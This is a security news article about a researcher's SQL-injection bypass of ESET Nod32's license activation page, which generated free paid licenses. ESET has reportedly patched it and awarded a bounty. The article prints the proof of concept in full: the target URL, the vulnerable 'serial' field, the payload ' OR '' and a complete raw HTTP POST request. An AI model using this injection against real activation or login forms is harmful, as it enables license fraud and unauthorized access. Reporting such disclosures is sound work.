Security Researcher discovers Vulnerability in ESET Nod32 Antivirus License authentication system which generates free license (username and password)

With so many worms and trojans out in the open, every computer user would like to have an Antivirus on board his/her PC but it would be really nice to have a paid version of an Antivirus for free. No this is not a giveaway but a researcher has discovered a serious vulnerability in the ESET Nod32 licensed version which allows hackers to use it for a full year without paying.

Security researcher, Mohamed Abdelbaset Elnoby has discovered a vulnerability in ESET Nod32 licensed version authentication  that allows potential hackers generate millions of usernames and passwords without a hitch.

Elnoby has dubbed the authentication bug as “hilarious” and he states that, “Hilarious Broken Authentication bug I found in ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of  “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free. ”

The exploit of generating unlimited usernames and passwords for ESET Nod32 is caused due to broken authentication bug. While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessed only after authentication has been performed. Elnoby discovered that there are several ways of bypassing the ESET Nod32 authentication like :

  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection

The PoC of the bug is given below :

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: https://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

Each time a potential hacker used the above authentication bypass string he/she could generate a free paid license of ESET Nod32 valid for 1 Year which costs $29.00 per user/request. ESET has acknowledged the vulnerability and has now patched the website. It also awarded Elnoby a bug bounty of 1 years free licence for his efforts. The bug may not be that hilarious but the bug bounty awarded to him sure seems  “hilarious” because Elnoby must have saved quite a fortune for ESET.

The video of the PoC is given below :

Resource : Egyption Geeks.

3 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here